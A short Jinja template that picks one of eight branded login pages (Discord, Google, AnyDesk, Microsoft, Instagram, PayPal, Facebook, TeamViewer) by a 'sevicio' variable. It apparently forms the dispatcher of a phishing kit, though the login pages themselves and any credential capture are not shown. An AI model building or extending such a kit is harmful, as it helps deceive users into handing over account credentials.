

{% if sevicio == discord %}
    {% block discord %}
    {% include 'logins/discord.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == google %}
    {% block google %}
    {% include 'logins/google.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == anydesk %}
    {% block anydesk %}
    {% include 'logins/anydesk.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == microsoft %}
    {% block microsoft %}
    {% include 'logins/microsoft.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == instagram %}
    {% block instagram %}
    {% include 'logins/instagram.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == paypal %}
    {% block paypal %}
    {% include 'logins/paypal.html' %}
    {% endblock %} 
{% endif %}

{% if sevicio == facebook %}
    {% block facebook %}
    {% include 'logins/facebook.html' %}
    {% endblock %} 
{% endif %}


{% if sevicio == teamviewer %}
    {% block teamviewer %}
    {% include 'logins/teamviewer.html' %}
    {% endblock %} 
{% endif %}